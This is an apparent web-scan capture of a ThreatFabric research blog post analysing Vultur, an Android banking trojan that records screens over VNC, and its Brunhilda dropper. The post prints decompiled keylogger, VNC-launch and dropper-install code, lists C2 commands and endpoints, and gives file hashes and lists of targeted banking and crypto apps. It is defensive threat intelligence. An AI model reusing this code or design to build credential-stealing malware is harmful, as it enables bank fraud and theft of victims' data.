www.threatfabric.com Open in urlscan Pro
199.60.103.254  Public Scan

Submitted URL: https://www.threatfabric.com/blogs/vultur-v-for-vnc.html
Effective URL: https://www.threatfabric.com/blogs/vultur-v-for-vnc
Submission: On November 21 via api from LU — Scanned from DE

Form analysis 1 forms found in the DOM

/hs-search-results

<form data-hs-do-not-collect="true" action="/hs-search-results">
  <input type="text" class="hs-search-field__input" name="term" autocomplete="off" aria-label="Search" placeholder="Search">
  <input type="hidden" name="type" value="SITE_PAGE">
  <input type="hidden" name="type" value="BLOG_POST">
  <input type="hidden" name="type" value="LISTING_PAGE">
</form>

Text Content

This website stores cookies on your computer. These cookies are used to collect
information about how you interact with our website and allow us to remember
you. We use this information in order to improve and customize your browsing
experience and for analytics and metrics about our visitors both on this website
and other media. To find out more about the cookies we use, see our Privacy
Policy

If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.

Cookies settings
AcceptDecline

Skip to content
 * OUR SOLUTION
 * PARTNERS
 * RESOURCES
 * IN THE NEWS
 * ARTICLES
 * Contact
 * Linkedin
 * Twitter
 * Jobs
 * Privacy
 * Intel/PGP


Contact



Research


VULTUR, WITH A V FOR VNC

22 July 2021




JUMP TO

 1.  Introduction
     1. Context
 2.  Here comes Vultur
 3.  Capabilities & Commands
     1. Modus Operandi
     2. Accessibility Services
     3. Screen Recording
 4.  Communication
     1. C2 Methods
     2. FCM Commands
     3. C2 paths
 5.  Targets
 6.  Brunhilda
     1. Dropper Functionality
 7.  Comparisons and Connections
     1. Old vs new Brunhilda
     2. Brunhilda vs Vultur
 8.  Conclusion
 9.  CSD & MTI
 10. Appendix
     1. Brunhilda Dropper
     2. Vultur
     3. Screen recording targets
     4. Keylogging targets


INTRODUCTION

In late March 2021, ThreatFabric detected a new RAT malware that we dubbed
Vultur due to its full visibility on victims device via VNC. For the first time
we are seeing an Android banking trojan that has screen recording and keylogging
as main strategy to harvest login credentials in an automated and scalable way.
The actors chose to steer away from the common HTML overlay strategy we usually
see in other Android banking Trojans: this approach usually requires more time
and effort from the actors in order to steal relevant information from the user.
Instead, they chose to simply record what is shown on the screen, effectively
obtaining the same end result.

Based on the intelligence gathered, ThreatFabric was able to obtain the list of
apps targeted by Vultur. Italy, Australia and Spain were the countries with most
banking institutions targeted. In addition, many crypto-wallets are targeted,
which is in line with the trend we observed in our previous blog “The Rage of
Android Banking Trojans”.

During the investigation ThreatFabric analysts discovered its connection with a
well-known dropper framework called Brunhilda, which uses droppers located in
Google Play to distribute malware (MITRE T1475).

In this blogpost ThreatFabric will prove that this dropper and Vultur are both
developed by the same threat actor group. The choice of developing its own
private trojan, instead of renting third-party malware, displays a strong
motivation from this group, paired with the overall high level of structure and
organization present in the bot as well as the server code.

--------------------------------------------------------------------------------

NOTE : ThreatFabric wants to make clear that both AlphaVNC and ngrok (the third
party softwares on which Vultur relies on to operate) are legitimate and legal
products. The developers that created these projects have no control over the
misuse of their software.

--------------------------------------------------------------------------------


CONTEXT

In September 2020, Bitdefender published a Bitdefender report about malware
droppers found on Google Play. The report states that these droppers were used
to distribute Cerberus banking malware. However, we believe that it was in
fact Alien banking malware, the successor of Cerberus, first reported by
ThreatFabric in September 2020.



The droppers on Google Play posed as some utility applications like fitness apps
and 2FA authenticators. However, in addition to performing their advertised
functionality, they installed banking malware on the victim’s device. Later, in
December 2020, PRODAFT revealed more details about the dropper and called it
Brunhilda, which at the time of their analysis was also distributing Alien
banking malware. It was still masquerading as fitness and authentication
applications on Google Play. In March 2021, ThreatFabric’s CSD detected
previously unknown malware with RAT capabilities that we named Vultur. While
investigating the new threat, ThreatFabric analysts were able to connect it with
the Brunhilda dropper. In this blog we will cover Vultur and discuss the
Brunhilda dropper to show they are connected and operated by a private group
using their own dropper to distribute different malware.


HERE COMES VULTUR

The vulture is a large bird of prey that specializes in attacking and feeding on
weak and helpless animals. These predators keep their eyes on their preys for a
long time before making a move, which happens only when they are sure the attack
is lethal and successful. Vultur, a new Android banking Trojan discovered by
ThreatFabric in March 2021, operates in a very similar way. Just like these big
birds, this trojan observes everything that is happening on the devices using a
screen recording feature based on VNC to obtain all the PII (Personal
Identifiable Information) needed to perform fraud, such as banking account
username, password and access tokens.



The ThreatFabric team was able to find at least 2 dropper applications connected
to Vultur, one of them having 5000+ installations from Google Play. Thus, we
estimate the number of potential victims to be in the thousands.


CAPABILITIES & COMMANDS


MODUS OPERANDI

Vultur approaches banking fraud with a Modus Operandi that is in some way
different from what we usually see from Android banking trojans. The usual
banking trojan MO heavily relies on abusing the overlay mechanic to trick
victims into revealing their passwords and other important private information.
In an overlay attack, users type their credentials in what they think is a
legitimate banking app, effectively giving them to a page controlled by the
attacker. Vultur, on the other hand, uses a less technically flexible yet very
effective technique: screen recording.


ACCESSIBILITY SERVICES

Like the large majority of banking trojans, Vultur heavily relies on
Accessibility Services. When it is first started the malware hides its app icon
and right after abuses the services to obtain all the necessary permissions to
operate properly. It is worth noting that the application requests for
Accessibility Service access showing a WebView overlay borrowed from other
malware families. In fact, the first time we saw this WebView was with Alien
banking malware.



Whenever any new event triggers the Accessibility Event service, the bot checks
if it is coming from an application that is part of the list of keylogging
targets. If so, then it uses the Accessibility Services to log everything typed
by the user.

public static void keylog(AccessibilityEvent event) {
    String data;
    if (!keyLoggerManager.KeyloggerActive) {
        return;
    }
    String v1 = event.getPackageName() == null ? "Unknown" : event.getPackageName().toString();
    if (AcService.keyloggerManager.isPkgKeylogged(v1)) {
        return;
    }
    try {
        new SimpleDateFormat("MM/dd/yyyy, HH:mm:ss z", Locale.US).format(Calendar.getInstance().getTime());
        if (!v1.equals(keyLoggerManager.packageName)) {
            if (keyLoggerManager.dataToBeSent.length() != 0) {
                keyLoggerManager.formattedData = keyLoggerManager.formattedData + keyLoggerManager.packageName + " | " + keyLoggerManager.dataToBeSent + "\\n";
            }
            keyLoggerManager.packageName = v1;
            keyLoggerManager.dataToBeSent = "";
        }
        int v12 = event.getEventType();
        if (v12 == 1) {
            data = event.getText().toString();
        } else {
            if (v12 != 16) {
                return;
            }
            data = event.getText().toString();
        }
        if (keyLoggerManager.replaceNumbersFlag) {
            data = data.replaceAll("[^0-9]", "");
        }
        if (data.length() != 0) {
            keyLoggerManager.dataToBeSent = keyLoggerManager.dataToBeSent + data;
            return;
        }
    } catch (Exception v0) {
        return;
    }
}

In addition to keylogging the services are used to stop the user from deleting
the application from the device using the traditional procedures, like going
into the settings and manually uninstalling the application. Whenever the user
reaches the app details screen, the bot automatically clicks the back button,
sending the user to the main settings screen, effectively not allowing access to
the uninstall button.


SCREEN RECORDING



After hiding its icon, Vultur proceeds to start its service responsible for
managing the main functionality of the trojan, which is screen recording using
VNC (Virtual Network Computing). VNC is a specific software implementation, but
it is not uncommon for malicious actors to use the term ‘VNC’ to refer to
anything falling under the umbrella of Screen Sharing with remote access (may
that be done using a third-party software like VNC or TeamViewer, or through
Android internal features, used by for example the Oscorp malware). In the case
of Vultur it actually refers to a real VNC implementation taken from AlphaVNC.
To provide remote access to the VNC server running on the device, Vultur
uses ngrok. ngrok is capable of exposing local servers behind NATs and firewalls
to the public internet over secure tunnels.

It is obligatory to point out that AlphaVNC and ngrok are legitimate and legal
products; however, like many other Android banking trojans, Vultur’s creators
had no remorse in abusing them to steal PII from its victims.

The main VNC-like features are implemented in native code. All the
functionalities, like for example the function nstart_vnc() in the code below,
are included in the libavnc.so library, which is interfaced to the application
using a wrapper class.

public static void startVnc(FileDescriptor fileDescriptor, VncSessionConfig config, o arg12, int arg13, int arg14, int arg15) {
    C2Commands.log("VNC: START VNC SERVICE");
    LvWrapper._instance.config = config;
    LvWrapper._instance.hThread = new HandlerThread("nUt");
    LvWrapper._instance.hThread.start();
    LvWrapper._instance.rThread = new HandlerThread("rCt");
    LvWrapper._instance.rThread.start();
    LvWrapper._instance.startThread = new Thread(new Runnable() {
        @Override public void run() {
            String v5 = config.getPw();
            int v6 = config.getVncPort();
            C2Commands.log("VNC: EXIT CODE = " + LvWrapper._instance.nstart_vnc(fileDescriptor, arg13, arg14, arg15, v5, v6));
            ((a.a.a.ScreenCapture.a) arg12).a();
        }
    });
    LvWrapper._instance.startThread.start();
}

The biggest threat that Vultur offers is its screen recording capability. The
trojan uses Accessibility Services to understand what application is in the
foreground. If the application is part of the list of targets, it will initiate
a screen recording session.



If the user pays attention to the notification panel, he would also be able to
see that Vultur, in this case masquerading as an app called “Protection Guard”,
is projecting the screen.


COMMUNICATION


C2 METHODS

Below is a complete list of the methods supported by the bot. These are the
commands that the bot can send to the C2 to request, or to send back,
information:

Method Description vnc.register Sends registration information vnc.status Sends
device status (is DeviceAdmin, is AccessibilityService enabled, is display on)
and VNC address vnc.apps Sends the list of installed packages vnc.keylog Sends
pressed keys log vnc.syslog Sends logs crash.logs Sends crash logs (logs all the
content on the screen via accessibility logging)


FCM COMMANDS

Below is a complete list of the commands that the bot can receive via
FirebaseCloudMessaging:

Method Description registered Received after successful registration start
Starts VNC connection using ngrok stop Stops VNC connection by deleting address,
killing the ngrok process and stopping VNC service unlock Unlocks screen delete
Uninstalls bot package pattern Provides a pattern of gesture/stroke to be
executed on the device


C2 PATHS

These are the endpoints reachable on the C2:

Path Description /rpc/ Endpoint for C2 communication via JSON-RPC /upload/
Endpoint for uploading files via POST (e.g. screen record)
/version/app/?filename=ngrok&arch={arm|386} Endpoint for downloading the
corresponding ngrok version


TARGETS

Vultur contains two sets of targets: screen recording and keylogging. The first
list reported in the appendix includes all the applications that will be victim
of screen recording using AlphaVNC, while the second list includes all the
applications targeted by the keylogging feature. The following chart shows the
number of targeted banking applications per country (applications of
cryptocurrency wallets and social applications are shown separately):




BRUNHILDA

Based on the intelligence gathered through our MTI (Mobile Threat Intelligence)
Portal and live detections identified via our CSD (Client Side Detection)
solution, ThreatFabric was able to link this Vultur campaign with Brunhilda.
Brunhilda is a privately operated dropper that has been previously observed
dropping Alien.A. The sample analyzed in this section was found on the Google
Play Store, but it has been removed at the time of writing.



This particular sample has 5.000+ installs, while the overall number victims of
Brunhilda group is estimated to be over 30.000 based on the Google Play and
unofficial application store statistics (some of the droppers have 10.000+
installations). This dropper is using the same icon, package name and C2 as a
Vultur sample. In addition, ThreatFabric discovered that the “Brunhilda Project”
C2 is extended with new capabilities to operate Vultur specific bot commands.


DROPPER FUNCTIONALITY

The dropper apps contain their advertised functionality, meaning the users can
use the app as they expect. In the background however it registers the device to
its C2 server, and if the necessary pre-requisites are met, the dropper can
download an APK file and install it as an update to the current application.
This is in line with the fact that ThreatFabric identified Vultur campaigns
using the same icon and package name as the dropper. Underneath is the section
of code that updates the package with the new APK.

public final void Install() {
    ((PowerManager) this.getSystemService("power")).newWakeLock(1, "wl:2").acquire();
    this.f(100);
    b v0 = new b(this);
    v0.a();
    while (SPUtils.getState() < 8) {
        if (SPUtils.getState() < 6) {
            try {
                Thread.sleep(500 L);
            } catch (InterruptedException v1) {
                v1.printStackTrace();
            }
            continue;
        }
        f0.installPackage();
        try {
            Thread.sleep(500 L);
        } catch (InterruptedException v1_1) {
            v1_1.printStackTrace();
        }
        new Thread(h.b).start();
    }
    this.stopAll();
    v0.unregisterReceiver();
}

Upon the launch of the application, a registration request is sent to the C2
server using the gRPC framework. The request contains basic information about
the device and dropper application that can be used to selectively target
specific victims: package name of the dropper, Android version, device model,
and OS language.



As a response it receives an appToken as a registration ID. This appToken is
later used in the following requests to identify the device. Shortly after
registration, the dropper requests for additional configuration and saves in
under the mcfg and info:pld fields in SharedPreferences. info:pld contains the
information about the application to be downloaded and installed: package name,
size, chunks and XOR key used to decrypt downloaded data. Once the application
data has been downloaded and decrypted the installation procedure will be
started.


COMPARISONS AND CONNECTIONS


OLD VS NEW BRUNHILDA

When we compare this dropper to one of the previously used samples we see strong
similarities between them. Older versions use JSON-RPC instead of gRPC, but the
flow and data sent is almost identical:



In addition we identified code reuse in other places, such as in the code that
processes the information on the application to download, which contained some
parameters that were present in both samples but not used in the newer one.


BRUNHILDA VS VULTUR

Other evidence of the connection between Brunhilda and Vultur is that we saw
Vultur using the same C2 as the Brunhilda has used in the past. Moreover, Vultur
also uses JSON-RPC to communicate with its C2 just like old versions of the
dropper:




CONCLUSION

The story of Vultur shows again how actors shift from using rented Trojans
(MaaS) that are sold on underground markets towards proprietary/private malware
tailored to the needs of the actor. It enables us to observe a group that covers
both processes of distribution and operation of malicious software.

Banking threats on the mobile platform are no longer only based on well-known
overlay attacks, but are evolving into RAT-like malware, inheriting useful
tricks like detecting foreground applications to start screen recording. This
brings the threat to another level, as such features open the door for on-device
fraud, circumventing detection based on phishing MO’s that require fraud to be
performed from a new device: With Vultur fraud can happen on the infected device
of the victim. These attacks are scalable and automated since the actions to
perform fraud can be scripted on the malware backend and sent in the form of
sequenced commands.

As the mobile channels of financial institutions continue to grow, mobile
banking malware will only become more popular. Besides a steep increase in
mobile malware volumes targeting banking apps last and this year, we see mobile
malware becoming more and more sophisticated enabling hard-to-detect large scale
attacks. This means that financial institutions should consider preparing
themselves by better understanding the risk posed to their mobile-first strategy
based on the current mobile threat landscape.


CSD & MTI

ThreatFabric makes it easier than it has ever been to run a secure mobile
payments business. With the most advanced threat intelligence for mobile
banking, financial institutions are able to build a threat-driven mobile
security strategy and use this unique knowledge to detect financial fraud on the
mobile devices of their customers in real-time.

Together with our customers and partners, we are building an easy-to-access
information system where financial institutions have more visibility on their
mobile banking threats in order to protect their end customers.

You can request our free trial for our MTI feed for the following TIPs:

 * Anomali
 * ThreatConnect
 * ThreatQuotient

If you want more information on how our MTI and CSD solutions can help your
organization, feel free to contact us at: sales@threatfabric.com


APPENDIX


BRUNHILDA DROPPER

App name Package name SHA-256 Protection Guard com.protectionguard.app
d3dc4e22611ed20d700b6dd292ffddbc595c42453f18879f2ae4693a4d4d925a


VULTUR

App name Package name SHA-256 Protection Guard com.appsmastersafey
f4d7e9ec4eda034c29b8d73d479084658858f56e67909c2ffedf9223d7ca9bd2 Authenticator
2FA com.datasafeaccountsanddata.club
7ca6989ccfb0ad0571aef7b263125410a5037976f41e17ee7c022097f827bd74


SCREEN RECORDING TARGETS

Package Name Application Label com.commbank.netbank CommBank au.com.nab.mobile
NAB Mobile Banking org.westpac.bank Westpac Mobile Banking
au.com.macquarie.banking Macquarie Mobile Banking com.bendigobank.mobile Bendigo
Bank au.com.suncorp.SuncorpBank Suncorp Bank au.com.ingdirect.android ING
Australia Banking com.anz.android.gomoney ANZ Australia
com.abnamro.nl.mobile.payment ABN AMRO Wallet App com.ing.mobile ING Bankieren
it.ingdirect.app ING Italia posteitaliane.posteapp.appposteid PosteID
posteitaliane.posteapp.apppostepay Postepay com.bankofqueensland.boq BOQ Mobile
au.com.amp.myportfolio.android My AMP au.com.bankwest.mobile Bankwest
au.com.mebank.banking ME Bank com.fusion.banking Bank Australia app org.bom.bank
Bank of Melbourne Mobile Banking org.stgeorge.bank St.George Mobile Banking
au.com.cua.mb CUA Mobile Banking au.com.hsbc.hsbcaustralia HSBC Australia
com.virginmoney.cards Virgin Money Credit Card org.banksa.bank BankSA Mobile
Banking cedacri.mobile.bank.crbolzano isi-mobile Cassa di Risparmio
com.latuabancaperandroid.pg Intesa Sanpaolo Business cedacri.mobile.bank.esperia
Mediobanca Private Banking com.ria.moneytransfer Ria Money Transfer – Send Money
Online Anywhere it.bnl.apps.banking.privatebnl My Private Banking
it.bcc.iccrea.mycartabcc myCartaBCC it.cedacri.hb3.desio.brianza D-Mobile
it.cedacri.hb2.bpbari Mi@ it.relaxbanking RelaxBanking Mobile
com.sella.BancaSella Banca Sella it.caitalia.apphub Crédit Agricole Italia
com.unicredit Mobile Banking UniCredit com.latuabancaperandroid Intesa Sanpaolo
Mobile posteitaliane.posteapp.appbpol BancoPosta
it.copergmps.rt.pf.android.sp.bmps Banca MPS com.lynxspa.bancopopolare YouApp
it.nogood.container UBI Banca it.gruppobper.ams.android.bper Smart Mobile
Banking it.gruppobper.smartbpercard Smart BPER Card it.bper.mobile.mymoney Smart
Mobile My Money com.vipera.chebanca CheBanca! com.CredemMobile Credem
com.opentecheng.android.webank Webank com.mediolanum.android.fullbanca
Mediolanum it.popso.SCRIGNOapp SCRIGNOapp it.icbpi.mobile Nexi Pay com.scrignosa
SCRIGNOIdentiTel com.VBSmartPhoneApp BankUp Mobile it.carige Carige Mobile
it.creval.bancaperta Bancaperta it.bnl.apps.banking BNL it.volksbank.android
Volksbank · Banca Popolare es.bancosantander.apps Santander
net.inverline.bancosabadell.officelocator.android Banco Sabadell App. Your
mobile bank es.liberbank.cajasturapp Banca Digital Liberbank
es.lacaixa.mobile.android.newwapicon CaixaBank com.bankinter.launcher Bankinter
Móvil com.bbva.bbvacontigo BBVA Spain es.cecabank.ealia2103appstore UniPay
Unicaja com.db.pbc.mibanco Mi Banco db com.grupocajamar.wefferent Grupo Cajamar
es.univia.unicajamovil UnicajaMovil es.bancosantander.empresas Santander
Empresas com.rsi ruralvía app.wizink.es WiZink, tu banco senZillo es.cm.android
Bankia com.imaginbank.apps Imagin. Much more than an app to manage your money
es.ibercaja.ibercajaapp Ibercaja com.bendigobank.mobile Bendigo Bank
com.mfoundry.mb.android.mb Multiple minor US financial institution
com.popular.android.mibanco Mi Banco Mobile com.grupocajamar.wefferent Grupo
Cajamar es.unicajabanco.app Unicaja Banco es.univia.unicajamovil UnicajaMovil
com.binance.dev Binance - Buy & Sell Bitcoin Securely com.coinbase.android
Coinbase – Buy & Sell Bitcoin. Crypto Wallet com.coinbase.pro Coinbase Pro –
Bitcoin & Crypto Trading com.coinbase.wallite Coinbase Wallet Lite org.toshi
Coinbase Wallet — Crypto Wallet & DApp Browser com.defi.wallet Crypto.com l DeFi
Wallet co.mona.android Crypto.com - Buy Bitcoin Now piuk.blockchain.android
Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum com.wallet.crypto.trustapp
Trust: Crypto & Bitcoin Wallet exodusmovement.exodus Exodus: Crypto Bitcoin
Wallet io.atomicwallet Bitcoin Wallet & Ethereum Ripple ZIL DOT
com.coinomi.wallet Coinomi Wallet :: Bitcoin Ethereum Altcoins Tokens
com.krakenfutures Kraken Futures: Bitcoin & Crypto Futures Trading
com.kraken.trade Pro: Advanced Bitcoin & Crypto Trading com.kraken.invest.app
Kraken - Buy Bitcoin & Crypto io.cex.app.prod CEX.IO Cryptocurrency Exchange
net.bitstamp.app Bitstamp – Buy & Sell Bitcoin at Crypto Exchange
com.etoro.wallet eToro Money com.kubi.kucoin KuCoin: Bitcoin Exchange & Crypto
Wallet com.bittrex.trade Bittrex Global com.bitfinex.mobileapp Bitfinex
com.plunien.poloniex Poloniex Crypto Exchange com.hittechsexpertlimited.hitbtc
HitBTC – Bitcoin Trading and Crypto Exchange com.paxful.wallet Paxful Bitcoin
Wallet com.cryptonator.android Cryptonator cryptocurrency wallet


KEYLOGGING TARGETS

Package Name Application Label com.whatsapp WhatsApp Messenger com.viber.voip
Viber Messenger - Messages, Group Chats & Calls com.zhiliaoapp.musically TikTok
- Make Your Day com.facebook.katana Facebook com.facebook.orca Messenger – Text
and Video Chat for Free com.facebook.lite Facebook Lite


QUESTIONS OR DEMO?

CONTACT US
 * JOBS
 * PRIVACY
 * INTEL/PGP
 * VULNERABILITY DISCLOSURE